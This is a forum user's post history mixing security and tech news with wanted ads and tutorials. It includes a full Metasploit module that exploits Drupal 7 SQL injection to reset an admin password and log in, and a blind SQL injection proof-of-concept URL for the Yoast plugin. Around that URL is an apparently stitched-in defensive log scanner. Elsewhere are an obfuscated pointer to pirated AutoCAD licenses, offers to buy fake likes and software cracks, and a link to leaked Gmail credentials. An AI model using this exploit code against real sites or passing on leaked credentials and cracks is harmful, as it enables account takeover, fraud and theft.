Everything posted by mrreboot

  1. Police are carrying out searches on Monday at companies and individuals suspected of creating websites through which they retransmitted programmes of several television stations, causing damage of 1.5 million euros, money that ended up in the accounts of several companies, some of them offshore. Police sources say the case concerns the Spice TV network, controlled by Alin Rotaru, the Galați native who built up the "ethnobotanical" drug business in Romania before these substances were banned by law. Four people are under investigation in this case for intellectual property offences and money laundering. Investigators are searching the homes of the four suspects and the companies they control, according to a press release from the Prosecutor's Office attached to the High Court of Cassation and Justice. According to investigators, between 2013 and 2015 the four suspects created several websites through which they made available to the public and retransmitted, for a fee, programmes of restricted-access television stations without their consent, thereby breaching copyright provisions. The four suspects are also alleged to have used several registered trademarks without the owner's consent and to have acquired assets through several companies registered abroad, using the money obtained from their illicit activities. To sell the special devices for receiving these programmes and to collect money from subscribers, the suspects set up numerous companies both in Romania and in other countries, including "off-shore" companies, with which they disguised the transactions carried out and hid the illicit income obtained, a large part of the sums obtained this way being reinvested, the Prosecutor's Office of the supreme court stated.
The four suspects thus caused damage estimated by investigators at approximately 1.5 million euros. According to police sources, the television programmes were retransmitted through the internet television network Spice TV. The four people suspected in this case are Alin Rotaru, Iuliana Rotaru, Claudiu Rotaru and Gheorghe Rain, the cited sources said. The searches are being carried out by police officers from the Directorate for the Investigation of Economic Crime, the Directorate for Communications and Information Technology, the Directorate for Special Operations and the Service for Special Interventions and Actions of the Romanian Police, with support from specialists of the National Forensic Institute, under the coordination of prosecutors from the Prosecutor's Office attached to the High Court of Cassation and Justice. SOURCE
  2. It also depends on the quality of the VPS. They sent an email with some changes; they are not blocking all VPSes. We received lots of feedback and many questions from our members regarding our decision to block IPs belonging to hosting providers from participating in the Traffic Exchange. Read below for further explanations and about a change we are introducing to the rule. We are perfectly aware that the change would cause inconvenience to some of our members, so let us further explain why we made the decision in the first place. As mentioned in our previous e-mail, the aim was to improve the overall traffic quality provided by the HitLeap service. How would blocking hosting provider IPs help? It's quite simple actually. A lot of HitLeap Viewer instances running on hosting provider machines are running in low resource conditions. This prevents the HitLeap Viewer from fully loading all websites, resulting in reduced traffic quality for all members. On the other hand, home users would not be banned as part of the new rule and home computers are usually powerful enough to properly run the application without any problems. After listening to the feedback and opinions of our members, we realized that this decision would cause unnecessary damage to many honest members - those who run the HitLeap Viewer on reasonably powerful servers or even home users running their internet connection through an IP belonging to hosting providers (e.g. VPNs). We figured we could do better and offer a solution that worked for everyone. Hosting provider IPs will no longer be blocked. Instead, we are introducing Session Slots. Similar to Website Slots, you need 1 Session Slot for every instance of HitLeap Viewer. Regular members get 2 Session Slots and Premium members get 5 Session Slots. This will cover the large majority of home users. If you wish to start more instances, you can always purchase more Session Slots at very reasonable prices. 
This, along with much stricter quality controls we will be introducing, will incentivize people to contribute quality traffic to the HitLeap network, removing the need to apply a very broad ban by simply blocking hosting provider IPs. We believe this change to be the most flexible solution, while still allowing us to improve traffic quality going forward. For anyone reading this far, here's a small extra bonus for you: a teaser of a Linux version of HitLeap Viewer we have been working on: see here
  3. // sorry for butting in, but maybe others need it too. It was an ebook on how to get licenses for Autocad 2014 or 2015 valid for 3 years. For those interested: =gGd0B3cBNTJv8CZs5CZy9Gci9Ge1NXZyN2buRXZuRnLj9WbvU3LxAjNwIDO4ATNvEWd092YhRmLw52Z No hints.
  4. Google today announced the launch of a security rewards program for Android at Black Hat’s Mobile Security Summit in London. The Android program will only cover vulnerabilities that affect Nexus phone and tablets available for sale in the Google Play Store, though. Right now, that’s the Nexus 6 phone and Nexus 9 tablet. Base rewards start at $500 for reporting moderately severe vulnerabilities and go up to $8,000 for researchers who report a critical bug, provide a test case and submit a patch. On top of that, Google will offer up to an additional $30,000 for exploits that can compromise TrustZone or Verified Boot (and slightly smaller rewards up to $10,000 and $20,000 for attacks from installed apps and remote or proximal attacks). Google believes the whole Android ecosystem will benefit from this vulnerability research, though. Given that the Nexus devices are the only ones Google has full control over — and that they run the company’s stock version of Android — it makes sense that the company would restrict this program to vulnerabilities that can be reproduced on these devices. The new program is in addition to Google’s existing Patch Reward Program, which also includes the open-source foundations of Android. Bugs that qualify for this new program include vulnerabilities in the Android open source code, OEM libraries and drivers, the kernel and ARM TrustZone OS and modules. Google says it has now paid out more than $4 million since the launch of its first bug bounty program in 2010. In 2014 alone, it paid out a total $1.5 million to more than 200 researchers. Source
  5. I don't care whether they are real, or about the country; I bought from addmefast and within two days they were all gone. (I think it's a filter from FB.) The idea is that they should last even if they are fake.
  6. Buying 10k likes for a Facebook page; waiting for PMs with offers. Payment: PayPal. For people with rep I pay in advance.
  7. Windows 10 has all kinds of great stuff going on under the hood, but one of the most intriguing things is a special version designed for the Raspberry Pi 2 and Arduino-certified boards. You can check out that version right now. The Windows 10 IoT Core Insider developer preview works with the Raspberry Pi 2, MinnowBoard Max, and Intel Galileo. It’ll also interface with other Arduino boards through a Windows Remote and Windows Virtual Shields. As you’d expect, the software’s a little rough around the edges, but the Windows Dev Center has a bunch of projects to get you familiar with the software. You can sign up for the developer preview and download the newest build for free at the link below. Develop Windows IoT Apps | Windows Dev Center via Windows Blog Source: LifeHacker
  8. Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

     Sniffs:
     - URLs visited
     - POST loads sent
     - HTTP form logins/passwords
     - HTTP basic auth logins/passwords
     - HTTP searches
     - FTP logins/passwords
     - IRC logins/passwords
     - POP logins/passwords
     - IMAP logins/passwords
     - Telnet logins/passwords
     - SMTP logins/passwords
     - SNMP community string
     - NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
     - Kerberos

     SOURCE
  9. Last year at Google I/O developer event, Google launched a limited beta "App Runtime for Chrome" (ARC) project, which now expanded to run millions of Android apps within Chrome browser. Google has released a new developer tool called App Runtime for Chrome (ARC) Welder that allows Android apps to run on Chrome for Linux, Windows, and OS X systems. App Runtime for Chrome (ARC) was an early experiment specifically designed for app developers, but now anyone can download it. Google Chrome's ARC Welder app can now run any of your favorite Android apps like WhatsApp, Candy Crush, Angry Birds, all from your Chrome web browser. ARC welder tool operates via some special runtime implemented using Native Client (NaCl) in-browser binary execution tech. Native Client is a Chrome sandboxing technology that allows Chrome plugins and apps to run at near-native speeds, taking full advantage of the system's CPU and GPU. Google ported complete Android stack to Native Client, allowing Android apps to run on most major operating systems.

     Google ARC welder tool is based on Android 4.4, but there are some limitations:
     - you can load only one app at a time
     - you have to select portrait or landscape layout
     - you need to choose whether you want the app to run on phone- or tablet-style.

     LEARN HOW TO RUN ANDROID APPS IN CHROME:
     - Install the latest Google Chrome browser.
     - Download and run the ARC Welder app from the Chrome Store.
     - Add third party APK file host.
     - After downloading APK app file to your PC, click Open.
     - Select the mode -> "Tablet" or "Phone" -> in which you want to run your app.
     - Finally, click the "Launch App" button.

     I have personally tried this tool before writing, and some of my favorite Android apps work pretty well. SOURCE
  10. I will pay 80€ for a crack for the following program; from what I have seen it has HASP4 protection. Executable: formula.exe. It is fairly old; I assume it is made in Visual Basic 6. Link: MEGA. Payment method: PayPal or bank transfer, after you show me via TeamViewer or video that it works. In case it helps, I have the original dongle but it no longer works; it is expired.
  11. A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers. The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO). The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’. All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw, according to an advisory published today. SQL injection (SQLi) vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input. HOW YOAST VULNERABILITY WORKS However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the 'admin/class-bulk-editor-list-table.php' file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only. Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL. If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley. 
Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in ‘WordPress SEO by Yoast’, which is as follows: http://victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc PATCH FOR YOAST SQLi VULNERABILITY However, the vulnerability has reportedly been patched in the latest version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor." Generally, it has been believed that if you have not installed WordPress Yoast for SEO, then your WordPress website is seriously incomplete. The vulnerability is really serious for website owners who wish to increase their search engine traffic by using this plugin. Therefore, WordPress administrators with disabled Auto-update feature are recommended to upgrade their WordPress SEO by Yoast plugin as soon as possible or they can manually download the latest version from WordPress plugin repository. If you have installed WordPress 3.7 version and above, then you can enable fully automate updating of your plugins and themes from Manage > Plugins & Themes > Auto Updates tab.
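A defender-side check for the issue described in the post above, as an added example that is not part of the original post or of the Yoast or WPScan code: it scans web-server access logs for requests to the plugin's bulk editor whose `orderby` or `order` parameter is anything other than a plain column name or `asc`/`desc`, and notes whether the request arrived with an off-site Referer, which fits the "authorized user clicks a crafted URL" scenario. The Apache combined log format, the `site_host` parameter, the function names and the sample log lines are assumptions constructed for illustration.

```python
"""Flag access-log requests to the Yoast bulk editor whose sort parameters
are not plain identifiers (added example; sample log lines are constructed)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format (assumed):
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "[^"]*")?'
)
COLUMN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")  # one bare column name
DIRECTIONS = {"asc", "desc"}
BULK_EDITOR_PAGE = "wpseo_bulk-editor"  # ?page= value shown in the published PoC


def check_request(target):
    """Return the reasons a request target looks like an injection attempt."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qs percent-decodes values, so %2c and %20 become ',' and ' '.
    params = parse_qs(parts.query, keep_blank_values=True)
    if BULK_EDITOR_PAGE not in params.get("page", []):
        return []
    reasons = []
    for value in params.get("orderby", []):
        if not COLUMN_RE.fullmatch(value):
            reasons.append("orderby is not a single column name: %r" % value)
    for value in params.get("order", []):
        if value.lower() not in DIRECTIONS:
            reasons.append("order is not asc/desc: %r" % value)
    return reasons


def scan(lines, site_host):
    """Scan log lines; site_host is the blog's own hostname (assumption)."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in combined format; skip rather than guess
        reasons = check_request(match.group("target"))
        if not reasons:
            continue
        ref_host = urlsplit(match.group("referer") or "").hostname
        findings.append({
            "ip": match.group("ip"),
            "time": match.group("time"),
            "status": int(match.group("status")),
            "reasons": reasons,
            # True when the click came from another site, as in the
            # social-engineering scenario the article describes.
            "cross_site": bool(ref_host) and ref_host != site_host,
        })
    return findings


# Constructed sample log: one normal bulk-editor view, one request using the
# query string published in the advisory, one unrelated admin page, one junk line.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jan/2015:10:00:01 +0000] "GET /wp-admin/admin.php?'
    'page=wpseo_bulk-editor&type=title&orderby=post_date&order=asc HTTP/1.1" '
    '200 5120 "http://blog.example/wp-admin/" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2015:10:05:42 +0000] "GET /wp-admin/admin.php?'
    'page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from'
    '%20(select(sleep(10)))a)&order=asc HTTP/1.1" '
    '200 5120 "http://other.example/page.html" "Mozilla/5.0"',
    '203.0.113.10 - - [01/Jan/2015:10:06:00 +0000] "GET /wp-admin/admin.php?'
    'page=other&orderby=a%2cb HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "blog.example"):
        print(finding)
```

The same allowlist (one bare column name, `asc` or `desc`) is the shape of check a server-side fix would apply before a sort parameter reaches an `ORDER BY` clause.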
  12. PHP Script to send and receive messages on WhatsApp

      I have been reading many tutorials for sending and receiving WhatsApp messages via PHP, but there is not a single article which explains properly, with steps, how to retrieve your WhatsApp password, which is created and stored on the WhatsApp server when you create a WhatsApp account, and which is the main challenge as of now in other articles. Thanks to this tool, which has made 50% of the work easy: https://github.com/shirioko/WART

      Okay, so we will quickly go through the steps for the WhatsApp Registration Tool:

      - Go to the link https://github.com/shirioko/WART
      - Download the whole project by clicking Clone to Desktop
      - Run the WART-1.7.3.0 exe file
      - Enter phone number with country code (e.g. India number: 91xxxxxxxxxx). P.S. Do not put any special symbol like (+91) for India
      - Click on Request Code and you will receive a code from WhatsApp on the entered mobile number.
      - Now verify that code in the 2nd step and that's it. You are here. Your password will appear. P.S. Do not share your password with anyone because it can be used in a loop for any kind of messages.

      Okay, now we are done with 50% of the task. Now we need to write the PHP script which will send messages to a WhatsApp registered number. You will need 2 things for sending messages to WhatsApp through PHP:

      - Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE): 91xxxxxxxxxxx
      - Password (which you got from the WART.EXE tool)

      Alright Sparky, let's get this done…..

      ```php
      <?php
      // WhatsAPI protocol class (from the src directory of the WhatsApi download)
      require_once './src/whatsprot.class.php';

      $username = "919xxxxxxxxx";   // Mobile phone prefixed with country code, so for India it will be 91xxxxxxxx
      $password = "your password";  // Password obtained from the WART tool

      // Name your application by replacing "WhatsApp Messaging"
      $w = new WhatsProt($username, 0, "Mayank Grover Blog", true);
      $w->connect();
      $w->loginWithPassword($password);

      $target  = '91xxxxxxxxxxx';   // Target phone, receiver phone
      $message = 'Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account';

      $w->SendPresenceSubscription($target);  // Let us first send presence to user
      $w->sendMessage($target, $message);     // Send message

      echo "Message Sent Successfully";
      ?>
      ```

      So everything is quite clear in the above script, i.e. you need to set your application details: username as mobile number, password which you got from the WART tool, target as your target mobile number and lastly the message (plain text which you need to send).

      Okay, now I know many questions are coming to your mind.

      In the first line, require src/whatsprot.class.php. What is this??? You need to download the WhatsApi from this link. There you will find the src directory with all the source files.

      Can we only send plain text messages, or media like images and videos??? Yes, we can send media files also. So next I will be writing a PHP script to send a media file to any WhatsApp account.

      SOURCE
  13. The most popular smartphone messaging service WhatsApp is now able to communicate with friends from their PC. No Rumours at all !! Enjoy WhatsApp from your desktop from now on. Last month, it was leaked that Whatsapp was working on a web client and finally from today they are introducing it to the public. The feature is called "WhatsApp Web," which gives its users the ability to read and send messages directly from their web browsers. Interested WhatsApp users simply need to open Chrome and navigate to WhatsApp Web in order to get started. A QR code will appear on the web page, which must be scanned using WhatsApp mobile application to activate the service. WhatsApp Web requires that you install and run the latest version of the Android app on your phone. The feature currently works on Android, Windows Phone, and BlackBerry, but unfortunately, there's no web solution at this time for iOS users because of limitations of the platform. "Today, for the first time, millions of you will have the ability to use WhatsApp on your web browser," WhatsApp wrote in a blog post. "Our web client is simply an extension of your phone: The web browser mirrors conversations and messages from your mobile device — this means all of your messages still live on your phone." Mediafire | WhatsApp 2.11.498 or update from Aptoide Source
  14. Oh, the irony… Remember, Lizard Squad the hackers who took down the XBox Live and PlayStation Networks at Christmas, in what they claimed was a publicity stunt for their DDoS-for-hire service? Well now, in an act of supreme irony worthy of a singalong from Alanis Morissette, Lizard Squad has been hacked itself. Oh dear. What a shame. Couldn’t happen to a nicer bunch of fellows… As Brian Krebs reports, the gang’s LizardStresser DDoS-on-demand service – powered by thousands of hacked residential internet routers – has been “completely compromised” and details of over 14,000 users passed to the authorities. Astonishingly, it appears that the Lizard Squad failed to encrypt its database of registered users – but instead stored details of their usernames and passwords in plaintext. A schoolboy error if ever I heard one. As I said at the end of last year, the authorities are likely to take a dim view of anyone purchasing the services of the Lizard Squad to launch a denial-of-service attack against a website or internet service. I wonder what LizardStresser’s users, who apparently have paid Lizard Squad the tidy sum of $11,000 in bitcoins to launch attacks so far, will think of their details now being in the hands of law enforcement agencies like the FBI? Lizard Squad hasn’t been having a great time of it since their yuletide antics against video game fans. Firstly, police in the UK arrested 22-year-old Vinnie Omari, a suspected member of the gang who perhaps made the unwise move of offering his expert advice about the Lizard Squad in an on-screen TV interview. Omari has since been bailed until March. Then it was revealed that Finnish police had questioned another suspected member of the Lizard Squad gang – Julius Kivimäki. Like Omari, Kivimäki hadn’t been shy about courting the media’s attention. 
And last Friday, British police announced that they had arrested an 18-year-old man in Southport in connection with the denial-of-service attacks against PlayStation Network and XBox Live. According to a BBC news report, the latest arrest was the result of a joint investigation between British law enforcement agencies and the FBI. The man has now been bailed until May. It would be a mistake to think, however, that the police action seen so far necessarily spells the end for Lizard Squad’s antics. The group’s Twitter feed, for instance, remains as vocal as ever – even going so far as to mimic the final tweet posted by Jake “Topiary” Davis, the spokesperson of the busted Lulzsec hacking gang, before his arrest in 2011. Source
  15. @ON Rather odd "investigation", it seems too direct. @Off Make my day "Verbatim-brand CD"
  16. A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported ‘The Hacker News’. Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst. In a video demonstration, they showed that by sending a 2000 words (2kb in size) message in special character set can crash the receiver's app. The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely. "What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal," Bhuyan told THN in an e-mail. According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions. Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don’t want someone to keep records of my chat with them, then I can also send the same message exploit to the person. The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1. They have also provided the Proof-of-Concept (PoC) video for the attack, users can watch above. 
WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million. WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the "largest deployment of end-to-end encryption ever." Video --> Source
  17. I bought too; in less than a day I received the tracking code from FedEx. They are serious.
  18. Download link: https://github.com/google/material-design-icons/releases/tag/1.0.0 Source: Gizmodo.es
  19. For Metasploit

      ```ruby
      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'Drupal 7 SQL Injection - Password Change',
            'Description'    => %q{
              This module exploits a SQL injection vulnerability in Drupal 7
              to update the password of a selected user to 'drupal'
            },
            'Author'         =>
              [
                'Stefan Horst', # Vulnerability discovery
                'Charlie Briggs'
              ],
            'License'        => MSF_LICENSE,
            'References'     =>
              [
                ['CVE', 'CVE-2014-3704'],
                ['URL', 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'],
                ['URL', 'https://www.drupal.org/SA-CORE-2014-005']
              ],
            'DisclosureDate' => 'Oct 15 2014'))

          register_options(
            [
              OptString.new('TARGETURI', [true, "The full URI to Drupal", "/"]),
              OptString.new('USERNAME', [true, "Username of target user", "admin"])
            ], self.class)
        end

        # Looks for a Drupal login form in the response
        def check
          res = send_request_cgi({
            'uri' => normalize_uri(target_uri.path)
          })

          if res and res.code == 200 and res.body.to_s =~ /form_build_id/
            return Msf::Exploit::CheckCode::Appears
          end
          return Msf::Exploit::CheckCode::Safe
        end

        def run
          print_status("#{peer} - Attempting to update password hash for user '#{datastore['USERNAME']}'")
          hash = "$S$Drl0vgZ9yuU9uc4JyaTMHxMPriC7q/PsOUOx52fCrVQSTpI/Tu4x"
          sqli = "name[lol;update+{users}+set+pass%3d'#{hash}'+where+name%3d'#{datastore['USERNAME']}';--]=lol&name[lol]=lol&pass=lol&&form_build_id=lol&form_id=user_login&op=Log+in"

          res = send_request_cgi({
            'method'   => 'POST',
            'uri'      => normalize_uri(target_uri.path),
            'vars_get' => {
              'q' => 'user',
            },
            'data'     => sqli
          })

          if res and res.code == 200
            print_status("#{peer} - Received 200, checking ability to login...")
            check_login(datastore['USERNAME'], 'drupal')
          else
            print_error("Rut roh. Something went wrong :/")
          end
        end

        def check_login(username, password)
          res = send_request_cgi({
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path),
            'vars_get'  => {
              'q' => 'user'
            },
            'vars_post' => {
              'name'          => username,
              'pass'          => password,
              'form_build_id' => 'lol',
              'form_id'       => 'user_login',
              'op'            => 'Log In'
            }
          })

          if res and res.code == 302
            print_status("#{peer} - Received 302, following...")
            redirect = URI(res.headers['Location']).path
            cookie = res.headers['Set-Cookie']
            res = send_request_cgi({
              'method'  => 'GET',
              'uri'     => redirect,
              'headers' => {
                'Cookie' => cookie
              }
            })
            if res and res.code == 200
              check_content(res.body.to_s, username, password)
            end
          elsif res and res.code == 200
            check_content(res.body.to_s, username, password)
          end
        end

        def check_content(body, username, password)
          if body !~ /not-logged-in/
            print_good("Success! Logged in as #{username}:#{password}")
          else
            print_error("Unable to log in, perhaps this site is patched!")
          end
        end
      end
      ```

      https://github.com/cnbriggs/stuff/blob/master/drupal_7_sqli.rb
  20. Yahoo servers have been infiltrated by Romanian hackers exploiting the Shellshock bug discovered last month, according to cyber security expert Jonathan Hall. In a blog post on his website Future South, Hall detailed the process by which he discovered Yahoo, Lycos and WinZip websites had all been infiltrated by a group of Romanian hackers. Hall had Google-searched a range of codes designed to identify which servers were vulnerable to Shellshock, and found that Romanian hackers had breached two Yahoo servers and were exploring the network in search of access points for Yahoo!Games, which has millions of users. Yahoo’s servers were vulnerable to attack because they were using an old version of server technology Bash. A Yahoo told The Independent: “A security flaw, called Shellshock, that could expose vulnerabilities in many web servers was identified on September 24. As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network. Last night, we isolated a handful of our impacted servers and at this time we have no evidence of a compromise to user data. We’re focused on providing the most secure experience possible for our users worldwide and are continuously working to protect our users’ data.” Before releasing this information, Hall emailed Yahoo and tweeted at its engineering team and CEO Marissa Mayer. It was confirmed to him that its servers had been infiltrated but Yahoo refused to pay him for alerting them as it was not part of the company’s bug bounty programme. Yahoo is notorious for its disregard of bug bounty hunters, having last year rewarded one such hacker who identified three bugs in Yahoo's servers with a $25 voucher for company merchandise. Also in his ethical-hack investigation, Hall found that hackers were using the WinZip domain - for the zip file creator/extractor - to locate other possibly accessible servers. 
“This breach affects ALL of us in one way or another, and it’s crucial that this problem be resolved with haste,” Hall said. Hall informed the FBI of the hackings. Romania is known as a hub for cyber crime; more than $1 billion stolen in the US by Romanian hackers in 2012, according to the American ambassador in Bucharest. Source: independent.co.uk
  21. A very good initiative and very good content.
  22. According to the Daily Dot, nearly 5 million usernames and passwords to Gmail accounts have been leaked on a Russian Bitcoin forum. Here's what you should know. The list has since been taken down, and there's no evidence that Gmail itself was hacked—just that these passwords have been leaked. Most sources are saying that lots of the information is quite old, so chances are they were leaked long ago—though others are claiming 60% of the passwords are still valid (not to mention really, really horrible). Source: LifeHacker Download link: google_5000000.7z — RGhost — file sharing
  23. Here you have the latest patched version (I had it included in a bundle I bought and they allowed me to update). Download Link: https://mega.co.nz/#!fBREyLxK!6srS8EWSWYC7zvtImuGWSjPlbfC9R0fjzSf3cmaF60E Source: Envato
  24. Twitter announced on Wednesday the launch of its own bug bounty program, rewarding security researchers for “responsibly-disclosed issues.” In collaboration with HackerOne, the social media network will reward researchers with a minimum of $140 for each vulnerability reported, with the payout depending on the criticality of the bug. “We’re lucky to have a vibrant group of independent security researchers who volunteer their time to help us spot potential issues,” states Twitter’s HackerOne page. “To recognize their efforts and the important role they play in keeping Twitter safe for everyone, we offer a bounty for reporting certain qualifying security vulnerabilities.” In addition to the Twitter.com domain, the program also applies to various other subdomains, such as ads.twitter.com, apps.twitter.com, tweetdeck.twitter.com and mobile.twitter.com, as well as its iOS and Android apps. Common vulnerabilities that security researchers could cash out on include unauthorized access to DMs, unauthorized access to protected tweets, cross-site scripting (XSS), cross-site request forgery (CSRF) and remote code execution (RCE). “Any design or implementation issue that is reproducible and substantially affects the security of Twitter users is likely to be in scope for the program,” said Twitter, adding that other Twitter properties or applications may be added in the future. The cash reward is a new addition to Twitter’ HackerOne program, which has been active for about three months. So far, the site reports 44 hackers have been “thanked” and 46 bugs have been disclosed. The site also lists “Top Hackers” under a “Hall of Fame.” Tim Erlin, Tripwire’s director of IT security and risk strategy said bug bounty programs have proven to be an effective tool for vendors to drive towards responsible disclosure by providing financial motivation than favors a vendor-first response. 
“While Twitter’s minimum payment of $140, to match the 140 characters allowed in a tweet, is a nice touch, the real value lies in driving discovered bugs to Twitter developers, instead of into underground communities of potential attackers.” “A bug bounty program also provides the vendor with a clear, quantifiable cost to target for reduction through improved development practices. Bug bounty programs make sense at the business level, so it’s no surprise that Twitter is following suit with their own process.” Security researchers may agree that bug bounty programs are a great way to incentivize security research, since it’s much easier for researchers to justify privately disclosing a bug when they know they’re getting a payout. However, even though a company pays a bug bounty, they still need to be diligent about issuing a fix quickly. “There is nothing stopping a researcher from selling a bug to multiple sources,” said Lamar Bailey, Tripwire’s director of the Vulnerability and Exposure Research Team (VERT). The social media network is now one of many major Internet companies that aim to make the Web safer for users, including Facebook, Yahoo! and Mozilla. In July, Google also announced “Project Zero,” its new security research team working disclosing vulnerabilities across the Internet. Source